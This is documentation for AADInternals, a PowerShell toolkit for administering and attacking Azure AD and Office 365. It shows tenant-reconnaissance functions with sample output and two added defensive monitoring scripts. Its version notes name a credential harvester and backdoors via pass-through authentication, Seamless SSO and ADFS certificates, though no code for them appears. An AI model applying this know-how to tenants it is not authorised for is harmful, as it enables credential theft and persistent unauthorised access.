AAD Internals

Introduction

AADInternals PowerShell module contains tools for administering and hacking Azure AD and Office 365.

Installation

The module can be installed from PowerShell:

# Install the module
Install-Module AADInternals

# Import the module
Import-Module AADInternals

The module is also available on GitHub at https://github.com/Gerenios/AADInternals and in the PowerShell Gallery.

About

AAD Internals is a PowerShell module where I’ve tried to put all the knowledge I’ve gained during the years spent with Office 365 and Azure AD. It is a result of hours of reverse-engineering and debugging of Microsoft tools related to Azure AD, such as PowerShell modules, directory synchronisation, and admin portals.

The module is a plain PowerShell script module, so you can copy and paste the code to your own scripts as needed. Having said that, there are some functions that utilise the built-in functionality of Windows, so everything might not work on every computer.

The module is now in early beta, so all comments and ideas are more than welcome. You can comment on this article or post bugs and fixes to GitHub.

I haven’t tried to duplicate all the functionality the MSOnline or AzureAD modules currently have. Instead, I decided to bring the information and functionality those modules don’t provide. Also, I have created some “blackhat” level functionality that allows administrators to do things that shouldn’t even be possible.

Detailed help about parameters etc. can be seen using the PowerShell Get-Help cmdlet:

# See help for Get-AADIntAccessTokenForAADGraph
Get-Help Get-AADIntAccessTokenForAADGraph

Version info

Version  Date           Version notes
-------  ----           -------------
0.2.8    Mar 30th 2020  Added functionality for registering PTA Agents and configuring users’ MFA settings. Includes an experimental PTA Agent that emulates Azure AD pass-through authentication.
0.2.7    Dec 12th 2019  “Black Hat Europe edition”. Added OneDrive for Business functions. Allows bypassing OneDrive (and SharePoint & Teams) domain restrictions.
0.2.6    Oct 30th 2019  “T2 infosec edition”. Added Kerberos support. Allows getting Access Tokens using Kerberos tickets, and using Seamless Single-Sign-On as backdoor.
0.2.5    Aug 16th 2019  ADFS certificate export finally working! Bug fixes.
0.2.4    Aug 2nd 2019   “Black Hat edition”. Added client, SPO, and SARA functions, several bug fixes.
0.2.3    May 29th 2019  Added functions to manipulate ADFS token signing certificates.
0.2.2    May 22nd 2019  Added PTASpy (pass-through authentication credential harvester and backdoor).
0.1.8    May 17th 2019  Added functions to extract and reset Azure AD Connect credentials.
0.1.7    May 10th 2019  Added Exchange Online and Outlook functionality + loads of other updates.
0.1.1    Oct 25th 2018  The first beta release.

Functionality

Playing with access tokens

Most of the functions use REST APIs that require OAuth access tokens. The AADInternals module uses the following types of access tokens:

Token/API                      Function                           Remarks
---------                      --------                           -------
AAD Graph                      Get-AADIntAccessTokenForAADGraph   Functions using an AAD Graph access token have a cache, so there is no need to pass the token as a parameter every time. If credentials are not passed, the function prompts for them (supports MFA).
MS Graph                       Get-AADIntAccessTokenForMSGraph    Not used in this version.
Pass Through Authentication    Get-AADIntAccessTokenForPTA        Used when enabling/disabling PTA and Seamless SSO (Desktop SSO).
Azure Admin Portal             Get-AADIntAuthTokenForAADIAMAPI    Used when inviting guest users.
Exchange Online                Get-AADIntAccessTokenForEXO        Used with Exchange Online and ActiveSync functions.
Support and Recovery Assistant Get-AADIntAccessTokenForSARA       Used with Support and Recovery Assistant functions.
SharePoint Online              Get-AADIntSPOAuthenticationHeader  Used with SharePoint Online functions.
OneDrive for Business          New-AADIntOneDriveSettings         Used with OneDrive for Business functions.

To get an AAD Graph access token and save it to cache, run the following function. The token will be valid for an hour, after that you need to run the function again.

# Prompt for credentials and retrieve & store access token to cache
Get-AADIntAccessTokenForAADGraph

Information Functions

Information functions are functions that can be used to retrieve information about users, tenants, and Office 365. Functions marked with * don’t need authentication. Functions marked with A use an AAD Graph access token, and functions marked with E use an Exchange Online access token.

Get-AADIntLoginInformation (*)

This function returns login information for the given user (or domain).

Example:

# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com

Output:

Federation Protocol                  : WSTrust
Pref Credential                      : 4
Consumer Domain                      : 
Cloud Instance audience urn          : urn:federation:MicrosoftOnline
Authentication Url                   : https://msft.sts.microsoft.com/adfs/ls/?username=nn%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
Throttle Status                      : 1
Account Type                         : Federated
Has Password                         : True
Federation Active Authentication Url : https://msft.sts.microsoft.com/adfs/services/trust/2005/usernamemixed
Exists                               : 0
Federation Metadata Url              : https://msft.sts.microsoft.com/adfs/services/trust/mex
Desktop Sso Enabled                  : 
Tenant Banner Logo                   : 
Tenant Locale                        : 
Cloud Instance                       : microsoftonline.com
State                                : 3
Domain Type                          : 4
Domain Name                          : microsoft.com
Tenant Banner Illustration           : 
Federation Brand Name                : Microsoft
Federation Global Version            : -1
User State                           : 2
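
Because Get-AADIntLoginInformation needs no authentication, it is also a cheap way to watch your own domains for unexpected federation changes. The following is an added example (not code from the AADInternals module): it reduces a login-information result to the federation-related fields, stores them as a baseline and reports any drift on the next run. The property names are the ones shown in the output above; the baseline file name and the sample values (a managed domain that suddenly reports federation to an unfamiliar STS) are constructed for the illustration.

```powershell
# Added example, not part of AADInternals. Reduce a Get-AADIntLoginInformation
# result to the fields that change when a domain's federation is altered.
function Get-LoginInfoFingerprint {
    param([Parameter(Mandatory = $true)]$LoginInfo)

    # Property names exactly as Get-AADIntLoginInformation outputs them
    $fields = 'Account Type', 'Federation Protocol', 'Authentication Url',
              'Federation Active Authentication Url', 'Federation Metadata Url',
              'Desktop Sso Enabled'

    $fingerprint = [ordered]@{}
    foreach ($field in $fields) {
        $fingerprint[$field] = [string]$LoginInfo.$field
    }
    return $fingerprint
}

# Compare a stored baseline (a hashtable, or the object ConvertFrom-Json returns)
# with a fresh lookup and emit one row per changed field.
function Compare-LoginInfo {
    param(
        [Parameter(Mandatory = $true)]$Baseline,
        [Parameter(Mandatory = $true)]$Current
    )
    $now = Get-LoginInfoFingerprint -LoginInfo $Current
    foreach ($field in $now.Keys) {
        $old = [string]$Baseline.$field
        if ($old -ne $now[$field]) {
            [pscustomobject]@{
                Field    = $field
                Baseline = $old
                Current  = $now[$field]
            }
        }
    }
}

# Constructed sample: a managed domain whose login information now claims to be
# federated to an unfamiliar STS. In real use $baselineInfo comes from the saved
# JSON file and $currentInfo from Get-AADIntLoginInformation -Domain <yourdomain>.
$baselineInfo = [pscustomobject]@{
    'Account Type'                         = 'Managed'
    'Federation Protocol'                  = ''
    'Authentication Url'                   = ''
    'Federation Active Authentication Url' = ''
    'Federation Metadata Url'              = ''
    'Desktop Sso Enabled'                  = 'True'
}
$currentInfo = [pscustomobject]@{
    'Account Type'                         = 'Federated'
    'Federation Protocol'                  = 'WSTrust'
    'Authentication Url'                   = 'https://sts.unexpected.example/adfs/ls/'
    'Federation Active Authentication Url' = 'https://sts.unexpected.example/adfs/services/trust/2005/usernamemixed'
    'Federation Metadata Url'              = 'https://sts.unexpected.example/adfs/services/trust/mex'
    'Desktop Sso Enabled'                  = 'True'
}

# Persist the baseline (constructed file name) so the next run can compare against it
$baseline = Get-LoginInfoFingerprint -LoginInfo $baselineInfo
$baseline | ConvertTo-Json | Set-Content -Path 'loginbaseline.json'

$stored = Get-Content -Path 'loginbaseline.json' -Raw | ConvertFrom-Json
$drift  = Compare-LoginInfo -Baseline $stored -Current $currentInfo
if ($drift) { $drift | Format-Table -AutoSize } else { 'No federation drift detected' }
```

Run it on a schedule against each of your verified domains and treat any change to Account Type, Authentication Url or the federation URLs as an incident until an administrator confirms it; these are the values the ADFS and token-signing manipulations listed in the version notes end up altering.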

Get-AADIntEndpointInstances (*)

This function returns the Office 365 instances and when the latest changes (e.g. to IPs and URLs) were made for each.

Example:

# Get Office 365 instances
Get-AADIntEndpointInstances 

Output:

instance     latest    
--------     ------    
Worldwide    2018100100
USGovDoD     2018100100
USGovGCCHigh 2018100100
China        2018100100
Germany      2018100100

Get-AADIntEndpointIps (*)

This function returns the Office 365 IP addresses and URLs for the given instance. The information can be used to create firewall rules.

Example:

# Get ips and urls for "normal" Office 365
Get-AADIntEndpointIps -Instance WorldWide

Output:

id                     : 1
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {outlook.office.com, outlook.office365.com}
ips                    : {13.107.6.152/31, 13.107.9.152/31, 13.107.18.10/31, 13.107.19.10/31...}
tcpPorts               : 80,443
expressRoute           : True
category               : Optimize
required               : True

id                     : 2
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {smtp.office365.com}
ips                    : {13.107.6.152/31, 13.107.9.152/31, 13.107.18.10/31, 13.107.19.10/31...}
tcpPorts               : 587
expressRoute           : True
category               : Allow
required               : True
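
The records above have one row per service with nested lists of IPs and URLs, whereas a firewall or proxy change request wants one row per destination. The following function is an added example (not code from the AADInternals module) that flattens endpoint records of the shape shown above into allow-list rows, keeping only the categories and required entries you ask for. The sample records are constructed to mirror the output above; a udpPorts field is handled on the assumption that some records carry one in the same comma-separated format as tcpPorts.

```powershell
# Added example, not part of AADInternals. Flatten endpoint records (as returned
# by Get-AADIntEndpointIps) into allow-list rows: one row per IP range or URL.
function ConvertTo-EndpointAllowList {
    param(
        [Parameter(Mandatory = $true, ValueFromPipeline = $true)]$Endpoint,
        [string[]]$Category = @('Optimize', 'Allow'),   # 'Default' only when asked for
        [switch]$RequiredOnly
    )
    process {
        if ($RequiredOnly -and -not $Endpoint.required) { return }
        if ($Category -notcontains $Endpoint.category) { return }

        # tcpPorts is a comma-separated string such as "80,443"; udpPorts is
        # assumed to use the same format when a record carries it
        $ports = @()
        if ($Endpoint.tcpPorts) {
            $ports += ($Endpoint.tcpPorts -split ',') | ForEach-Object { "tcp/$($_.Trim())" }
        }
        if ($Endpoint.udpPorts) {
            $ports += ($Endpoint.udpPorts -split ',') | ForEach-Object { "udp/$($_.Trim())" }
        }

        foreach ($destination in (@($Endpoint.ips) + @($Endpoint.urls))) {
            if (-not $destination) { continue }
            # CIDR ranges end in "/<prefix length>", host names do not
            $kind = if ($destination -match '/\d+$') { 'ip' } else { 'url' }
            [pscustomobject]@{
                Id          = $Endpoint.id
                ServiceArea = $Endpoint.serviceArea
                Category    = $Endpoint.category
                Kind        = $kind
                Destination = $destination
                Ports       = ($ports -join ' ')
            }
        }
    }
}

# Constructed sample records mirroring the Get-AADIntEndpointIps output above
$sample = @(
    [pscustomobject]@{
        id = 1; serviceArea = 'Exchange'; category = 'Optimize'; required = $true
        urls = @('outlook.office.com', 'outlook.office365.com')
        ips = @('13.107.6.152/31', '13.107.9.152/31'); tcpPorts = '80,443'; udpPorts = $null
    }
    [pscustomobject]@{
        id = 2; serviceArea = 'Exchange'; category = 'Allow'; required = $true
        urls = @('smtp.office365.com')
        ips = @('13.107.6.152/31', '13.107.9.152/31'); tcpPorts = '587'; udpPorts = $null
    }
    [pscustomobject]@{
        id = 3; serviceArea = 'Common'; category = 'Default'; required = $false
        urls = @('optional.example'); ips = @(); tcpPorts = '443'; udpPorts = $null
    }
)

# Only the two required Optimize/Allow records survive; duplicate IP ranges with
# different port sets stay separate rows.
$sample | ConvertTo-EndpointAllowList -RequiredOnly |
    Sort-Object Destination, Ports -Unique |
    Format-Table -AutoSize

# With the module installed the live data goes through the same pipeline:
# Get-AADIntEndpointIps -Instance Worldwide | ConvertTo-EndpointAllowList -RequiredOnly |
#     Export-Csv -Path allowlist.csv -NoTypeInformation
```

Pair this with Get-AADIntEndpointInstances: when the "latest" value for your instance changes, regenerate the list and diff it against the previous CSV before touching firewall rules.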

Get-AADIntTenantDetails (A)

This function returns details for the given tenant.

Example:

# Get tenant details
Get-AADIntTenantDetails

Output:

odata.type                           : Microsoft.DirectoryServices.TenantDetail
objectType                           : Company
objectId                             : e21e0e8c-d2ed-4edf-aa91-937963949cdc
deletionTimestamp                    : 
assignedPlans                        : ..
city                                 : 
companyLastDirSyncTime               : 2018-10-25T12:53:43Z
country                              : 
countryLetterCode                    : FI
dirSyncEnabled                       : True
displayName                          : Company Ltd
marketingNotificationEmails          : {}
postalCode                           : 
preferredLanguage                    : en
privacyProfile                       : 
provisionedPlans                     : ..
provisioningErrors                   : {}
securityComplianceNotificationMails  : {}
securityComplianceNotificationPhones : {}
state                                : 
street                               : 
technicalNotificationMails           : {user@alt.none}
telephoneNumber                      : 123456789
verifiedDomains                      : ..

Get-AADIntTenantID (*)

Since version 0.1.6
This function returns the tenant ID for the given user, domain, or access token.

Example:

# Get tenant ID
Get-AADIntTenantID -Domain microsoft.com

Output:

72f988bf-86f1-41af-91ab-2d7cd011db47

Get-AADIntOpenIDConfiguration (*)

Since version 0.1.6
This function returns the OpenID configuration for the given user or domain.

Example:

# Get OpenID configuration
Get-AADIntOpenIDConfiguration -Domain microsoft.com

Output:

authorization_endpoint                : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
token_endpoint                        : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/token
token_endpoint_auth_methods_supported : {client_secret_post, private_key_jwt, client_secret_basic}
jwks_uri                              : https://login.microsoftonline.com/common/discovery/keys
response_modes_supported              : {query, fragment, form_post}
subject_types_supported               : {pairwise}
id_token_signing_alg_values_supported : {RS256}
http_logout_supported                 : True
frontchannel_logout_supported         : True
end_session_endpoint                  : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/logout
response_types_supported              : {code, id_token, code id_token, token id_token...}
scopes_supported                      : {openid}
issuer                                : https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/
claims_supported                      : {sub, iss, cloud_instance_name, cloud_instance_host_name...}
microsoft_multi_refresh_token         : True
check_session_iframe                  : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/checksession
userinfo_endpoint                     : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/openid/userinfo
tenant_region_scope                   : WW
cloud_instance_name                   : microsoftonline.com
cloud_graph_host_name                 : graph.windows.net
msgraph_host                          : graph.microsoft.com
rbac_url                              : https://pas.windows.net

Get-AADIntServiceLocations (A)

This function shows the tenant’s true service locations.

Example:

# Get service location information of the tenant
Get-AADIntServiceLocations | Format-Table

Output:

Region Instance             Name                          State Country
------ --------             ----                          ----- -------
EU     EU001                PowerBI                             IR     
EU     PROD_MSUB01_02       SCO                                 IE     
NA     NA001                MultiFactorService                  US     
NA     NA001                AzureAdvancedThreatAnalytics        US     
EU     Prod04               Adallom                             GB     
NA     NA001                AADPremiumService                   US     
EU     EURP191-001-01       exchange                            IE     
NA     NA003                YammerEnterprise                    US     
NA     NA001                To-Do                               US     
NA     NA001                TeamspaceAPI                        US     
NA     NA001                Sway                                US     
EU     SPOS1196             SharePoint                          NL     
EU     EU                   RMSOnline                           NL     
EU     PROD_EU_Org_Ring_152 ProjectWorkManagement               NL     
NA     NA001                ProcessSimple                       US     
NA     NA001                PowerAppsService                    US     
NA     NA001                OfficeForms                         US     
NA     NA001                MicrosoftStream                     US     
NA     NorthAmerica1        MicrosoftOffice                     US     
EU     EMEA-2E-S3           MicrosoftCommunicationsOnline       NL     
EU     emea05-01            ExchangeOnlineProtection            NL     
NA     NA001                Deskless                            US     
NA     NA002                SMIT                                US     
NA     NA001                Metro                               US     
EU     EU003                DirectoryToCosmos                   GB     
NA     *                    BecWSClients                        US     
NA     NA033                BDM                                 US     
EU     EUGB02               AadAllTenantsNotifications          GB

Get-AADIntServicePlans (A)

This function returns information about the tenant’s service plans, such as name, id, status, and when first assigned.

Example:

# Get the service plans of the tenant
Get-AADIntServicePlans | Format-Table

Output:

SKU               ServicePlanId                        ServiceName           ServiceType                   AssignedTimestamp    CapabilityStatus ProvisioningStatus
---               -------------                        -----------           -----------                   -----------------    ---------------- ------------------
ENTERPRISEPREMIUM b1188c4c-1b36-4018-b48b-ee07604f6feb PAM_ENTERPRISE        Exchange                      2018-09-27T15:47:45Z Enabled          Success           
                  76846ad7-7776-4c40-a281-a386362dd1b9                       ProcessSimple                 2018-09-27T15:47:25Z Deleted                            
                  c87f142c-d1e9-4363-8630-aaea9c4d9ae5                       To-Do                         2018-09-27T15:47:24Z Deleted                            
                  c68f8d98-5534-41c8-bf36-22fa496fa792                       PowerAppsService              2018-09-27T15:47:25Z Deleted                            
                  9e700747-8b1d-45e5-ab8d-ef187ceec156                       MicrosoftStream               2018-09-27T15:47:25Z Deleted                            
                  2789c901-c14e-48ab-a76a-be334d9d793a                       OfficeForms                   2018-09-27T15:47:25Z Deleted                            
ENTERPRISEPREMIUM 9f431833-0334-42de-a7dc-70aa40db46db LOCKBOX_ENTERPRISE    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 3fb82609-8c27-4f7b-bd51-30634711ee67 BPOS_S_TODO_3         To-Do                         2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 7547a3fe-08ee-4ccb-b430-5077c5041653 YAMMER_ENTERPRISE     YammerEnterprise              2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8e0c0a52-6a6c-4d40-8370-dd62790dcd70 THREAT_INTELLIGENCE   Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 9c0dab89-a30c-4117-86e7-97bda240acd2 POWERAPPS_O365_P3     PowerAppsService              2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM b737dad2-2f6c-4c65-90e3-ca563267e8b9 PROJECTWORKMANAGEMENT ProjectWorkManagement         2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 5dbe027f-2339-4123-9542-606e4d348a72 SHAREPOINTENTERPRISE  SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c098270-9dd4-4350-9b30-ba4703f3b36b ADALLOM_S_O365        Adallom                       2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 6c6042f5-6f01-4d67-b8c1-eb99d36eed3e STREAM_O365_E5        MicrosoftStream               2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 07699545-9485-468e-95b6-2fca3738be01 FLOW_O365_P3          ProcessSimple                 2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4de31727-a228-4ec3-a5bf-8e45b5ca48cc EQUIVIO_ANALYTICS     Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 0feaeb32-d00e-4d66-bd5a-43b5b83db82c MCOSTANDARD           MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 70d33638-9c74-4d01-bfd3-562de28bd4ba BI_AZURE_P2           PowerBI                       2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 43de0ff5-c92c-492b-9116-175376d08c38 OFFICESUBSCRIPTION    MicrosoftOffice               2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 3e26ee1f-8a5f-4d52-aee2-b81ce45c8f40 MCOMEETADV            MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e95bec33-7c88-4a70-8e19-b10bd9d0c014 SHAREPOINTWAC         SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c7d2df8-86f0-4902-b2ed-a0458298f3b3 Deskless              Deskless                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 57ff2da0-773e-42df-b2af-ffb7a2317929 TEAMS1                TeamspaceAPI                  2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4828c8ec-dc2e-4779-b502-87ac9ce28ab7 MCOEV                 MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 34c0d7a0-a70f-4668-9238-47f9fc208882 EXCHANGE_ANALYTICS    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM f20fedf3-f3c3-43c3-8267-2bfdd51c0939 ATP_ENTERPRISE        Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM efb87545-963c-4e0d-99df-69c6916d9eb0 EXCHANGE_S_ENTERPRISE Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e212cbc7-0961-4c40-9825-01117710dcb1 FORMS_PLAN_E5         OfficeForms                   2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM a23b959c-7ce8-4e57-9140-b90eb88a9e97 SWAY                  Sway                          2018-08-27T05:46:51Z Enabled          Success           
EMSPREMIUM        113feb6c-3fe4-4440-bddc-54d774bf0318 EXCHANGE_S_FOUNDATION Exchange                      2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        eec0eb4f-6444-4f95-aba0-50c24d67f998 AAD_PREMIUM_P2        AADPremiumService             2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        c1ec4a95-1f05-45b3-a911-aa3fa01094f5 INTUNE_A              SCO                           2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        2e2ddb96-6af9-4b1d-a3f0-d6ecfd22edb2 ADALLOM_S_STANDALONE  Adallom                       2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        6c57d4b6-3b23-47a5-9bc9-69f17b4947b3 RMS_S_PREMIUM         RMSOnline                     2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        41781fb2-bc02-4b7c-bd55-b576c07bb09d AAD_PREMIUM           AADPremiumService             2018-08-13T10:17:34Z Enabled          Success           
EMSPREMIUM        14ab5db5-e6c4-4b20-b4bc-13e36fd2227f ATA                   AzureAdvancedThreatAnalytics  2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        8a256a2b-b617-496d-b51b-e76466e88db0 MFA_PREMIUM           MultiFactorService            2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        5689bec4-755d-4753-8b61-40975025187c RMS_S_PREMIUM2        RMSOnline                     2018-08-13T10:17:31Z Enabled          Success           
ENTERPRISEPREMIUM 882e1d05-acd1-4ccb-8708-6ee03664b117 INTUNE_O365           SCO                           2018-07-26T15:47:50Z Deleted          PendingActivation 
EMSPREMIUM        bea4c11e-220a-4e6d-8eb8-8ea15d019f90 RMS_S_ENTERPRISE      RMSOnline                     2018-06-26T10:47:37Z Enabled          Success

Get-AADIntSubscriptions (A)

This function returns the tenant’s subscription details, such as name, id, number of licenses, and when created.

Example:

# Get subscriptions of the tenant
Get-AADIntSubscriptions

Output:

SkuPartNumber     WarningUnits TotalLicenses IsTrial NextLifecycleDate    OcpSubscriptionId                    ConsumedUnits ObjectId                             SkuId                                DateCreated         
-------------     ------------ ------------- ------- -----------------    -----------------                    ------------- --------                             -----                                -----------         
EMSPREMIUM        0            250           true    2018-11-13T00:00:00Z 76909010-12ed-4b05-b3d7-ee1b42c21b4e 21            58265dbe-24e0-4cdb-8b62-51197a4c1c13 b05e124f-c7cc-45a0-a6aa-8cf78c946968 2018-08-13T00:00:00Z
ENTERPRISEPREMIUM 25           25            true    2018-10-27T15:47:40Z 7c206b83-2487-49fa-b91e-3d676de02ccb 21            df58544b-5062-4d6c-85de-937f203bbe0f c7df2760-2c81-4ef7-b578-5b5392b571df 2018-08-27T00:00:00Z

Get-AADIntSPOServiceInformation (A)

This function returns details of the tenant’s SharePoint Online instance, such as when it was created and last modified.

Example:

# Get SharePoint Online information
Get-AADIntSPOServiceInformation

Output: (sorted for clarity)

CreatedOn                               : 6/26/2018 11:16:12 AM
EnableOneDriveforSuiteUsers             : False
InstanceId                              : 44f5a625-f90e-4916-b8ab-ec45d38bdbb6
LastModifiedOn                          : 10/25/2018 7:37:38 AM
OfficeGraphUrl                          : https://company-my.sharepoint.com/_layouts/15/me.aspx
RootAdminUrl                            : https://company-admin.sharepoint.com/
RootIWSPOUrl                            : https://company-my.sharepoint.com/
SPO_LegacyPublicWebSiteEditPage         : Pages/Forms/AllItems.aspx
SPO_LegacyPublicWebSitePublicUrl        : 
SPO_LegacyPublicWebSiteUrl              : 
SPO_MySiteHostUrl                       : https://company-my.sharepoint.com/
SPO_MySiteHost_AboutMeUrl               : https://company-my.sharepoint.com/person.aspx
SPO_MySiteHost_DocumentsUrl             : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments
SPO_MySiteHost_NewsFeedUrl              : https://company-my.sharepoint.com/default.aspx
SPO_MySiteHost_ProjectSiteUrl           : https://company-my.sharepoint.com/_layouts/15/MyProjects.aspx
SPO_MySiteHost_SitesUrl                 : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites
SPO_PublicWebSitePublicUrl              : 
SPO_PublicWebSiteUrl                    : NotSupported
SPO_RegionalRootSiteUrl                 : https://company.sharepoint.com/
SPO_RootSiteUrl                         : https://company.sharepoint.com/
SPO_TenantAdminUrl                      : https://company-admin.sharepoint.com/
SPO_TenantAdmin_CreateSiteCollectionUrl : https://company-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx
SPO_TenantAdmin_ProjectAdminUrl         : https://company-admin.sharepoint.com/
SPO_TenantAdmin_ViewSiteCollectionsUrl  : https://company-admin.sharepoint.com/
SPO_TenantUpgradeUrl                    : https://company-admin.sharepoint.com/
ServiceInformation_LastChangeDate       : 10/25/2018 7:37:22 AM
ShowSites_InitialVisibility             : True
ShowSkyDrivePro_InitialVisibility       : True
ShowYammerNewsFeed_InitialVisibility    : True
VideoPortalServerRelativeUrl            : /portals/hub/_layouts/15/videohome.aspx

Get-AADIntCompanyInformation (A)

This function returns the tenant’s company information. Pretty much the same functionality as the Get-MsolCompanyInformation cmdlet.

Example:

# Get company information of the tenant
Get-AADIntCompanyInformation

Output:

AllowAdHocSubscriptions                  : false
AllowEmailVerifiedUsers                  : false
AuthorizedServiceInstances               : AuthorizedServiceInstances
AuthorizedServices                       : 
City                                     : 
CompanyDeletionStartTime                 : 
CompanyTags                              : CompanyTags
CompanyType                              : CompanyTenant
CompassEnabled                           : 
Country                                  : 
CountryLetterCode                        : GB
DapEnabled                               : 
DefaultUsageLocation                     : 
DirSyncAnchorAttribute                   : 
DirSyncApplicationType                   : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DirSyncClientMachineName                 : SERVER2016
DirSyncClientVersion                     : 1.1.882.0
DirSyncServiceAccount                    : Sync_SERVER2016_acf4f37725ce@company.onmicrosoft.com
DirectorySynchronizationEnabled          : true
DirectorySynchronizationStatus           : Enabled
DisplayName                              : Company Ltd
InitialDomain                            : company.onmicrosoft.com
LastDirSyncTime                          : 2018-10-25T13:53:46Z
LastPasswordSyncTime                     : 2018-10-25T14:03:01Z
MarketingNotificationEmails              : 
MultipleDataLocationsForServicesEnabled  : 
ObjectId                                 : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
PasswordSynchronizationEnabled           : true
PortalSettings                           : PortalSettings
PostalCode                               : 
PreferredLanguage                        : en
ReleaseTrack                             : StagedRollout
ReplicationScope                         : EU
RmsViralSignUpEnabled                    : false
SecurityComplianceNotificationEmails     : 
SecurityComplianceNotificationPhones     : 
SelfServePasswordResetEnabled            : false
ServiceInformation                       : ServiceInformation
ServiceInstanceInformation               : ServiceInstanceInformation
State                                    : 
Street                                   : 
SubscriptionProvisioningLimited          : false
TechnicalNotificationEmails              : TechnicalNotificationEmails
TelephoneNumber                          : 123456789
UIExtensibilityUris                      : 
UsersPermissionToCreateGroupsEnabled     : false
UsersPermissionToCreateLOBAppsEnabled    : false
UsersPermissionToReadOtherUsersEnabled   : true
UsersPermissionToUserConsentToAppEnabled : false

Get-AADIntCompanyTags (A)

This function returns tags attached to the tenant. Microsoft uses these to identify the status of certain changes, such as a SharePoint version update.

Example:

# Get the tags attached to the tenant
Get-AADIntCompanyTags

Output:

azure.microsoft.com/azure=active
o365.microsoft.com/startdate=635711754831829038
o365.microsoft.com/version=15
o365.microsoft.com/signupexperience=GeminiSignUpUI
o365.microsoft.com/14to15UpgradeScheduled=True
o365.microsoft.com/14to15UpgradeCompletedDate=04-16-2013

Get-AADIntSyncConfiguration (A)

This function returns synchronisation details.

Example:

# Get the synchronisation configuration of the tenant
Get-AADIntSyncConfiguration

Output:

TresholdCount                           : 501
UserContainer                           : 
TenantId                                : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
ApplicationVersion                      : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DisplayName                             : Company Ltd
IsPasswordSyncing                       : true
AllowedFeatures                         : {ObjectWriteback,  , PasswordWriteback}
PreventAccidentalDeletion               : EnabledForCount
TotalConnectorSpaceObjects              : 15
MaxLinksSupportedAcrossBatchInProvision : 15000
UnifiedGroupContainer                   : 
IsTrackingChanges                       : false
ClientVersion                           : 1.1.882.0
DirSyncFeatures                         : 41021
SynchronizationInterval                 : PT30M
AnchorAttribute                         : 
DirSyncClientMachine                    : SERVER2016
IsDirSyncing                            : true
TresholdPercentage                      : 0

Get-AADIntTenantDomains (E)

Since version 0.1.6
This function returns all domains from the tenant of the given domain. The given user MUST have the GlobalAdmin / CompanyAdministrator role in the tenant running the function, but no rights to the target tenant are needed. Works fine with trial tenants too.

Example:

# Get the access token
$at = Get-AADIntAccessTokenForEXO

# List domains from tenant where company.com is registered
Get-AADIntTenantDomains -AccessToken $at -Domain company.com

Output:

company.com
company.fi
company.co.uk
company.onmicrosoft.com
company.mail.onmicrosoft.com

Utilities

Utilities provide functionality for troubleshooting and the like.

Read-AADIntAccesstoken (*)

This function shows access (and ID and refresh) token information. For debugging, the most important values are the audience (aud) and the issuer (iss).

You can also show details of a token copied from the browser session’s Authorization header.

Example:

# Show access token information
$at = Get-AADIntAccessTokenForAADGraph
Read-AADIntAccesstoken $at

Output:

aud                 : https://graph.windows.net
iss                 : https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/
iat                 : 1540478026
nbf                 : 1540478026
exp                 : 1540481926
acr                 : 1
aio                 : ASQA2/8JAAAAXhS3vMo2OGlXvBZG0tScm9njsJUDhvoHtwdSlUx2Jvg=
amr                 : {pwd}
